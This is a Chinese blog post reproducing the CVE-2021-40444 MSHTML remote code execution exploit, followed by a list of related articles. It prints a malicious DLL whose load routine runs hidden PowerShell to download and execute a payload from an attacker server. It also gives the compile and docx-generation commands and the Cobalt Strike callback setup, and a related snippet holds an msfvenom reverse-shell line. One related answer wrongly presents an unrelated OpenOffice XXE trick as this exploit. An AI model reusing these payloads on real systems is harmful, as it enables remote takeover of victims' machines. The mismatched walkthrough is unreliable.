CVE-2021-40444_复现

最新推荐文章于 2024-05-17 09:52:13 发布
最新推荐文章于 2024-05-17 09:52:13 发布
阅读量1k 收藏 4
点赞数 2
CC 4.0 BY-SA版权
文章标签: c++ c# windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/PureDust/article/details/120285489
本文详细描述了CVE-2021-40444漏洞的复现步骤,包括下载代码、安装环境、设置服务端、制作DLL、运行Poc及生成DOCX。同时介绍了微软提供的临时禁用ActiveX控制的修复方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

CVE-2021-40444_Microsoft MSHTML 远程代码执行复现

描述

未经身份验证的攻击者可以利用该漏洞在目标系统上远程执行代码。微软官方表示已经监测到该漏洞存在在野利用。目前微软暂未发布相关补丁,用户可通过禁用ActiveX控件的方式暂时避免该漏洞利用

准备

1.下载github的代码
https://github.com/lockedbyte/CVE-2021-40444

2.安装lcab
sudo apt-get install lcab
在这里插入图片描述

3.安装编译环境
apt-get install mingw-w64
在这里插入图片描述

上线

设置cs,powershell,端口设置了8080

在这里插入图片描述

制作dll文件

读取REPRODUCE.md即可知道如何制作dll,shell.c记得里面的端口是8080

1.shell.c

#include <windows.h>
void exec(void) {
	system("powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://xx.xx.xx.xx:8080/a'))\"");
	return;
}
BOOL WINAPI DllMain(
    HINSTANCE hinstDLL,
    DWORD fdwReason, 
    LPVOID lpReserved )
{
    switch( fdwReason ) 
    { 
        case DLL_PROCESS_ATTACH:
           exec(); 
           break;

        case DLL_THREAD_ATTACH:
            break;

        case DLL_THREAD_DETACH:
            break;

        case DLL_PROCESS_DETACH:
            break;
    }
    return TRUE;
}

2.编译
i686-w64-mingw32-gcc -shared shell.c -o shell.dll
在这里插入图片描述
3.放入test目录
在这里插入图片描述

运行poc生成docx

python3 exploit.py generate test/shell.dll http://xx.xx.xx.xx #公网服务器主机
在这里插入图片描述

公网服务器主机开启web服务

python3 -m http.server 80

在目标主机打开文档即可上线

在这里插入图片描述

修复

微软提供了临时缓解措施:在 Internet Explorer 中禁用所有 ActiveX 控件的安装。

操作如下:

将如下代码复制到文本文件中并以 .reg 文件扩展名保存:


    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]

    "1001"=dword:00000003

    "1004"=dword:00000003

    [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]

    "1001"=dword:00000003

    "1004"=dword:00000003

    [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]

    "1001"=dword:00000003

    "1004"=dword:00000003

    [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]

    "1001"=dword:00000003

    "1004"=dword:00000003

2、双击该 .reg 文件。

3、重启系统。

CVE-2021-40444 复现
问题很多的小明
09-20 1714
利用过程:在Office文档中添加恶意ActiveX控件,以此来诱导目标用户打开恶意文档 复现环境:Ubuntu + WIN10 利用工具:Github:https://github.com/lockedbyte/CVE-2021-40444 0x01 生成恶意dll : msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=4444 -f dll > shell.dll 需要提前下载lcab库 .
〖EXP〗Ladon CVE-2021-40444 Office漏洞复现Cobalt Strike上线
K8哥哥
09-15 2490
漏洞概述 北京时间9月8日,绿盟科技CERT监测到微软发布安全通告披露了Microsoft MSHTML 远程代码执行漏洞,攻击者可通过制作恶意的 ActiveX 控件供托管浏览器呈现引擎的 Microsoft Office文档使用,成功诱导用户打开恶意文档后,可在目标系统上以该用户权限执行任意代码。微软在通告中指出已检测到该漏洞被在野利用,请相关用户采取措施进行防护。 MSHTML(又称为Trident)是微软旗下的Internet Explorer 浏览器引擎,也用于 Office 应用程序,以在 Wo
CVE-2021-40444复现
weixin_42345596的博客
09-16 1917
CVE-2021-40444 漏洞描述 2021年9月8日,微软发布安全通告披露了Microsoft MSHTML远程代码执行漏洞,攻击者可通过制作恶意的ActiveX控件供托管浏览器呈现引擎的 Microsoft Office文档使用,成功诱导用户打开恶意文档后,可在目标系统上以该用户权限执行任意代码,微软在通告中指出已检测到该漏洞被在野利用,请相关用户采取措施进行防护。 MSHTML(又称为Trident)是微软旗下的Internet Explorer浏览器引擎,也用于Office应用程序,以在Word
CVE-2021-40444漏洞复现
1ance's blog
09-25 3990
简介 MSHTML(又称Trident)是微软Windows操作系统Internet Explorer(IE)浏览器的排版组件。软件开发人员使用该组件,可以在应用中快速实现网页浏览功能。MSHTML除应用于IE浏览器、IE内核浏览器外,还在Office的Word、Excel和PowerPoint文档中用来呈现Web托管内容。 9月7日,微软公司发布了针对Microsoft MSHTML远程代码执行漏洞的紧急安全公告。攻击者利用该漏洞,通过精心构造包含可被加载的恶意 ActiveX控件的Microsoft O
CVE-2021-40444漏洞复现详细
热门推荐
weixin_51203422的博客
09-14 1万+
2021年9月8日,微软官方发布了MSHTML组件的风险通告(漏洞编号:CVE-2021-40444),未经身份验证的攻击者可以利用该漏洞在目标系统上远程执行代码。微软官方表示已经监测到该漏洞存在在野利用。 1、漏洞详情: Microsoft MSHTML远程代码执行漏洞 CVE-2021-40444 严重级别:严重 CVSS:8.8 被利用级别:检测到利用 危害:未经身份验证的攻击者可以利用该漏洞在目标系统上执行代码。 在野利用:微软表示已经发现攻击者利用此漏洞。在Office文档中添...
漏洞复现CVE-2021-40444(Microsoft MSHTML 远程代码执行漏洞)
weixin_42282189的博客
09-24 1520
作者:墨阳 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x01 前言 微软MSHTML引擎存在代码执行漏洞,攻击者通过精心制作包含恶意ActiveX的Offcie文档,诱导用户打开,从而实现远程代码执行。当用户主机启用了ActiveX控件,攻击者可通过该漏洞控制受害者主机。 目前,该漏洞EXP已公开,微软官方公布已检测到在野利用,已发布修复补丁。 影响范围: Windows Server, version 20H2 (Server Core Installation) .
CVE-2021-25281:链接CVE-2021-25281和CVE-2021-25282以利用SaltStack
03-03
2021年,盐栈遭遇了两个严重的安全漏洞,分别是CVE-2021-25281和CVE-2021-25282。这两个漏洞允许攻击者在受影响的系统上执行任意代码,从而可能导致数据泄露、系统破坏或被用作进一步攻击的跳板。 **CVE-2021-...
检测通过“ proxylogon”组漏洞(CVE-2021-26855,CVE-2021-26857,CVE-2021-26858,CVE-2021-27065)利用的Microsoft Exchange服务器上掉落的Web Shell-.NET开发
05-27
预认证SSRF,CVSS:3.0 9.1 / 8.4 CVE-2021-26857,不安全的反序列化导致特权升级到SYSTEM级别,CVSS:3.0 7.8 / 7.2 CVE-2021-26858,认证后文件写入, CVSS:3.0 7.8 / 7.2 CVE-2021-27065,认证后文件写入,CVSS...
CVE-2021-27246_Pwn2Own2020
03-03
Pwn2Own 2020东京版-TPlink漏洞利用 这是在Pwn2Own 2020 Tokyo期间用于开发TPlink Archer路由器的文件。 该漏洞的编号为CVE-2021-27246。 您可以在synacktiv网站上查看博客文章以了解详细信息。
CVE-2021-25735:利用CVE-2021-25735
05-14
CVE-2021-25735 利用CVE-2021-25735:Kubernetes验证准入Webhook绕过 设置脆弱的环境 让我们从运行脚本gencerts.sh开始以生成TLS证书和密钥。 bash gencerts.sh 要部署接纳控制器,您需要在本地构建Docker容器映像...
CVE-2018-8174_EXP:CVE-2018-8174_python
05-16
CVE-2018-8174_EXP 用法:CVE-2018-8174.py [-h] -u URL -o输出[-i IP] [-p端口] 针对CVE-2018-8174的漏洞利用 可选参数:-h,--help显示此帮助消息并退出-u URL,--url URL exp url -o OUTPUT,--output OUTPUT...
CVE-2021-3493利用脚本
04-29
CVE-2021-3493利用脚本,具体参考https://blog.csdn.net/weixin_43742395/article/details/116274008
CVE-2021-40444:MSHTML RCE预警
Fly_鹏程万里
09-13 2586
影响范围 Windows Server, version 20H2 (Server Core Installation) Windows Server, version 2004 (Server Core installation) Windows Server 2022 (Server Core installation) Windows Server 2022 Windows Server 2019 (Server Core installation) Windows Server 2019
Microsoft MSHTML远程代码执行(CVE-2021-40444)
huayimy的博客
02-03 375
Microsoft MSHTML远程代码执行(CVE-2021-40444).攻击者利用该漏洞,通过精心构造包含可被加载的恶意 ActiveX控件的Microsoft Office文件,并诱导受害者打开文档,从而触发此漏洞。未经身份验证的攻击者利用该漏洞,可获得受害者的当前用户权限,以该用户权限执行任意代码。打开后,靶机计算器被成功调用,至此漏洞利用成功。
全面武装的CVE-2021-40444漏洞利用工具
最新发布
gitblog_00078的博客
05-17 361
全面武装的CVE-2021-40444漏洞利用工具 去发现同类优质开源项目:https://gitcode.com/ 项目简介 Fully Weaponized CVE-2021-40444 是一个恶意docx文件生成器,它能够利用Microsoft Office Word中的CVE-2021-40444远程代码执行漏洞,并支持任意DLL文件。该工具最近已更新以支持最新的Follina攻击(通过m...
CVE-2021-40444-Microsoft MSHTML远程命令执行漏洞分析(三)
include_voidmain的博客
06-30 633
CVE-2021-40444-Microsoft MSHTML远程命令执行漏洞分析(三)
CVE-2021-40444-Microsoft MSHTML远程命令执行漏洞分析(二)
include_voidmain的博客
06-30 355
CVE-2021-40444-Microsoft MSHTML远程命令执行漏洞分析(二)
深入剖析CVE-2021-40444-Cabless利用链
m0_67105288的博客
02-27 310
背景 CVE-2021-40444为微软MHTML远程命令执行漏洞,攻击者可通过传播Microsoft Office文档,诱导目标点击文档从而在目标机器上执行任意代码。该漏洞最初的利用思路是使用下载cab并释放、加载inf文件的形式执行恶意代码。独立安全研究员Eduardo B.在github公开了一种新的“无CAB”的漏洞利用方法及其POC。公众号之前发布的研判文章中已对在野利用中出现的新的Cabless利用链以及RAR文件隐藏载荷的巧妙方法进行了分析。本篇将进一步探究该利用链的技术本质,并在复现攻击场
cve-2021-40444漏洞kali复现
04-06
由于cve-2021-40444漏洞的严重性,建议仅在合法授权的测试环境中进行复现和测试,不要在生产环境中尝试。 以下是在Kali Linux中复现cve-2021-40444漏洞的步骤: 1. 安装 OpenOffice 打开终端并输入以下命令: ``` sudo apt update sudo apt install openoffice ``` 2. 创建恶意文档 使用文本编辑器创建一个名为“恶意文档.odt”的OpenOffice文档,并将以下内容复制并粘贴到文档中: ``` <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> <root> <Content>Some content</Content> <Image xlink:href="expect://id`xxe`"/> </root> ``` 这个文档包含一个外部实体xxe,它引用了/etc/passwd文件。攻击者可以通过xxe漏洞读取系统上的任何文件。 3. 打开恶意文档 在终端中,输入以下命令以打开恶意文档: ``` soffice恶意文档.odt ``` OpenOffice将打开文档并加载其中的外部实体。攻击者可以在OpenOffice中使用“编辑”功能读取/操作系统文件。 可以在终端中使用以下命令测试是否可以读取/etc/passwd文件: ``` cat /tmp/dump ``` 如果成功,将输出/etc/passwd文件的内容。 4. 修复漏洞 为了防止cve-2021-40444漏洞的利用,建议升级OpenOffice或LibreOffice到最新版本,或者禁用OpenOffice的自动加载外部实体功能。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值